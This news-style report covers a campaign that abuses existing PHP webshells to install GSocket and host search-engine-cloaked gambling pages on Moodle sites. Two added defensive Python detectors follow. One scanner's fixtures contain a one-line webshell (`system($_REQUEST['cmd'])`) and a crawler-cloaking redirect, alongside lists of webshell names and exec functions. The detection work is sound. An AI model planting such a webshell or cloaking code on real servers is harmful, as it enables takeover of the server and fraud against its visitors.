A large-scale campaign has emerged in which attackers abuse PHP-based web applications to deploy malware on servers worldwide.
Imperva Threat Research has uncovered a coordinated campaign targeting thousands of websites, with a particular focus on Indonesian online gambling platforms.
The attacks, originating from Python-based bots, have been observed over the past two months, coinciding with intensified efforts by the Indonesian government to crack down on illegal online gambling.
While the researchers observed that the campaign has affected web servers worldwide, there is a notable concentration on Indonesian sites, aligning with recent enforcement actions in the country.
At the heart of this malicious campaign is the deployment of GSocket (Global Socket), a networking toolkit developed by HackersChoice.
The attackers are using a one-liner command to install GSocket on compromised servers. Because both ends of a GSocket session connect outbound to a relay network, the resulting remote connections work through NAT and firewalls that would block inbound access.
This tool allows attackers to establish encrypted TCP connections between hosts regardless of network restrictions. Rather than exploiting new vulnerabilities, the attackers target pre-existing webshells on already-compromised PHP servers.
By sending a high volume of requests to common webshell paths with known request parameters, the attackers increase their chances of locating active webshells through which they can execute commands and install the GSocket toolkit.
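The probing behaviour described above leaves a recognisable trace in web server access logs: one source address requesting many webshell-like file names (mostly 404s) and then a 200 on one of them with a command-style parameter or a POST body. The following detector is an added example written for this article, not code from Imperva or from the campaign; the webshell file names and parameter names are illustrative assumptions, and the log lines are constructed test data.

```python
import re
from collections import defaultdict

# Parser for Apache/nginx combined log format (referer and user-agent optional).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Illustrative webshell file names and command parameters (assumptions for this
# example, not the campaign's actual list; extend from your own intelligence).
WEBSHELL_NAMES = {"shell.php", "cmd.php", "wso.php", "c99.php", "alfa.php", "up.php", "x.php"}
CMD_PARAMS = {"cmd", "c", "exec", "command", "pass", "p", "action"}

# Constructed sample log: one scanner (203.0.113.7) probing several names, finding
# a live shell under the Moodle tree and driving it; one ordinary user alongside.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2025:10:00:01 +0000] "GET /shell.php HTTP/1.1" 404 196 "-" "python-requests/2.31.0"
203.0.113.7 - - [10/Jan/2025:10:00:01 +0000] "GET /cmd.php HTTP/1.1" 404 196 "-" "python-requests/2.31.0"
203.0.113.7 - - [10/Jan/2025:10:00:02 +0000] "GET /wso.php HTTP/1.1" 404 196 "-" "python-requests/2.31.0"
203.0.113.7 - - [10/Jan/2025:10:00:02 +0000] "GET /c99.php HTTP/1.1" 404 196 "-" "python-requests/2.31.0"
203.0.113.7 - - [10/Jan/2025:10:00:03 +0000] "GET /moodle/lib/alfa.php HTTP/1.1" 200 512 "-" "python-requests/2.31.0"
203.0.113.7 - - [10/Jan/2025:10:00:04 +0000] "GET /moodle/lib/alfa.php?cmd=id HTTP/1.1" 200 87 "-" "python-requests/2.31.0"
203.0.113.7 - - [10/Jan/2025:10:00:05 +0000] "POST /moodle/lib/alfa.php HTTP/1.1" 200 12 "-" "python-requests/2.31.0"
198.51.100.20 - - [10/Jan/2025:10:01:00 +0000] "GET /course/view.php?id=2 HTTP/1.1" 200 8842 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Jan/2025:10:01:05 +0000] "GET /login/index.php HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    path, _, query = rec["path"].partition("?")
    rec["path"], rec["query"] = path, query
    rec["status"] = int(rec["status"])
    return rec


def query_params(query):
    """Return the set of parameter names in a query string."""
    return {kv.split("=", 1)[0] for kv in query.split("&") if kv}


def analyze(lines, probe_threshold=5):
    """Return per-IP findings.

    'scanning' is set when an IP has requested at least probe_threshold distinct
    webshell-like paths; 'webshell_hits' lists 200 responses on such a path where
    the request carried a command-style parameter or was a POST.
    """
    probes = defaultdict(set)
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        basename = rec["path"].rsplit("/", 1)[-1].lower()
        if basename not in WEBSHELL_NAMES:
            continue
        probes[rec["ip"]].add(rec["path"])
        commanded = rec["method"] == "POST" or bool(query_params(rec["query"]) & CMD_PARAMS)
        if rec["status"] == 200 and commanded:
            hits[rec["ip"]].append(rec["path"])
    findings = {}
    for ip in set(probes) | set(hits):
        findings[ip] = {
            "probed_paths": len(probes[ip]),
            "scanning": len(probes[ip]) >= probe_threshold,
            "webshell_hits": hits.get(ip, []),
        }
    return findings


if __name__ == "__main__":
    for ip, info in analyze(SAMPLE_LOG.splitlines()).items():
        print(ip, info)
```

Run it against a real log with `analyze(open("/var/log/apache2/access.log").readlines())`; the 404-heavy scanning pattern is the early warning, and any entry in `webshell_hits` means a live shell answered and the host should be treated as compromised, including a check for a GSocket process and whatever persistence it installed.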
Technical Analysis
Moodle, a popular Learning Management System, has been identified as a primary target in this campaign.
Investigators discovered numerous backdoored Moodle instances with traces of GSocket infection. The attackers have implemented persistence mechanisms, allowing them to maintain access even after the removal of initial backdoors.
Further investigation revealed that the compromised servers are being used to host landing pages for Indonesian online gambling services.
These pages are designed to be visible only to search engine bots, while regular visitors are redirected to other gambling domains.
This tactic allows the attackers to exploit legitimate websites to promote illegal gambling operations, making it challenging for authorities to shut down these activities.
The scale of this exploitation is significant, with search engine results for common Indonesian gambling terms revealing a vast network of compromised sites.
This approach enables threat actors to quickly adapt when one gambling site is taken offline, ensuring minimal disruption to their illegal operations.
Website owners and administrators must remain vigilant and prioritize cybersecurity to protect their digital assets and users from exploitation.
To mitigate the risks associated with this campaign, website administrators are urged to:
- Regularly check for backdoors and unauthorized modifications to web application files, for example by comparing the deployed tree against a known-good copy of the same release.
- Implement robust security measures, including regular software updates and patches.
- Use Web Application Firewalls (WAF) to detect and block malicious requests.
- Monitor server logs for suspicious activity, such as bursts of requests to webshell-like paths or unexpected POST requests to PHP files, and for unauthorized access attempts.
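The cloaking technique described in the technical analysis (a page that serves gambling content to search engine crawlers and redirects everyone else) and the first mitigation above (checking for backdoors) can both be triaged by scanning the PHP tree for a small set of source-level indicators: a user-agent check that names a crawler next to a redirect, and a command-execution function fed by decoded or request-supplied data. The scanner below is an added example written for this article, not code from Imperva or Moodle; the indicator regexes are assumptions, and the sample files it builds are constructed fixtures with a harmless placeholder payload.

```python
import re
import tempfile
from pathlib import Path

# Indicator patterns (assumptions for this example; tune against your code base).
UA_CHECK = re.compile(r"HTTP_USER_AGENT", re.I)
BOT_NAMES = re.compile(r"googlebot|bingbot|yandex|duckduckbot|slurp", re.I)
REDIRECT = re.compile(r"header\s*\(\s*['\"]Location:|http-equiv=['\"]refresh", re.I)
EXEC_FUNCS = re.compile(r"\b(eval|assert|system|shell_exec|passthru|exec|popen|proc_open)\s*\(", re.I)
DECODERS = re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13|hex2bin)\s*\(", re.I)
REQUEST_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
PHP_SUFFIXES = {".php", ".phtml", ".inc"}


def classify(source):
    """Return the set of indicator tags that apply to one PHP source text."""
    tags = set()
    if UA_CHECK.search(source) and BOT_NAMES.search(source) and REDIRECT.search(source):
        tags.add("ua-cloaking-redirect")   # crawler-only content, humans redirected
    if EXEC_FUNCS.search(source) and DECODERS.search(source):
        tags.add("obfuscated-exec")        # eval/system over decoded data
    if EXEC_FUNCS.search(source) and REQUEST_INPUT.search(source):
        tags.add("request-to-exec")        # request parameter reaches an exec function
    return tags


def scan_tree(root):
    """Walk a web root and map each flagged PHP file (relative path) to its sorted tags."""
    root = Path(root)
    findings = {}
    for path in root.rglob("*"):
        if path.suffix.lower() not in PHP_SUFFIXES:
            continue
        try:
            source = path.read_text(errors="replace")
        except OSError:
            continue
        tags = classify(source)
        if tags:
            findings[path.relative_to(root).as_posix()] = sorted(tags)
    return findings


# Constructed fixture tree: an injected cloaking index page, a webshell dropped
# under lib/, and two clean Moodle-style files that must not be flagged.
SAMPLE_FILES = {
    "index.php": """<?php
$ua = strtolower($_SERVER['HTTP_USER_AGENT'] ?? '');
if (strpos($ua, 'googlebot') !== false || strpos($ua, 'bingbot') !== false) {
    include __DIR__ . '/.cache/landing.html';  // gambling page shown only to crawlers
} else {
    header('Location: https://gambling.example/', true, 302);
    exit;
}
""",
    "lib/alfa.php": """<?php
if (isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); }
eval(base64_decode('ZWNobyAxOw=='));  // placeholder payload: decodes to 'echo 1;'
""",
    "course/view.php": """<?php
require_once(__DIR__ . '/../config.php');
$id = optional_param('id', 0, PARAM_INT);
echo $OUTPUT->header();
""",
    "admin/tool.php": """<?php
$q = htmlspecialchars($_GET['q'] ?? '');
echo "<p>$q</p>";
""",
}


def build_sample_tree():
    """Write the constructed fixtures into a temp directory and return its path."""
    root = Path(tempfile.mkdtemp(prefix="moodle-scan-"))
    for rel, body in SAMPLE_FILES.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body)
    return str(root)


if __name__ == "__main__":
    for rel, tags in sorted(scan_tree(build_sample_tree()).items()):
        print(rel, tags)
```

Point `scan_tree` at the real document root (`scan_tree("/var/www/moodle")`) and review every hit by hand: `eval`, `assert` and `$_GET` occur in legitimate code, so the output is a triage list, not a verdict, and a clean scan does not rule out a backdoor that uses a pattern the regexes do not cover.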